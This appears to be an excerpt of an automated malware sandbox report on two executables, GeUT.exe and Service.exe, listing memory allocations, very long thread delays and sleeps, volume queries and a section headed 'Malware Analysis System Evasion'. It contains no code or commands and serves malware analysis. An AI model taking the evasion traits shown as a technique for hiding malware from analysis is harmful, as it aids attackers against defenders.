Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: C90000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 27F0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2550000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: AE0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 25D0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 45D0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 1870000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 32E0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 3220000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2CC0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2E40000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 4E40000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: FD0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2810000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: FD0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: FA0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2990000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 27D0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 880000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2400000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 4400000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2900000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2AE0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2930000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: AF0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2890000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 4890000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2C20000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2E50000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2CA0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: E10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 28A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 48A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: C10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 25A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 45A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 1230000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2EE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2E20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 1420000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2F70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 4F70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: C00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2980000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2790000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2FF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 3170000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 5170000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 1710000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 3160000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2F40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2C30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2DB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 4DB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2EB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 3080000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2EB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 12F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2DE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2BD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: B90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 27D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2550000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 24F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2620000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 4620000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2DC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 3080000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 5080000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: CE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 28A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2650000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: EE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2C80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 1180000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 1650000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 3240000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 5240000 memory reserve | memory write watch

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Window / User API: threadDelayed 462			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Window / User API: threadDelayed 9010			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 1036	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5704	Thread sleep time: -339000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5704	Thread sleep time: -9010000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 1020	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5708	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 6104	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 3704	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 4544	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5932	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5664	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 2612	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5144	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5588	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5192	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5808	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 4232	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5764	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5684	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 992	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5156	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 6284	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 1408	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 4600	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 1924	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 3384	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 4856	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 3000	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
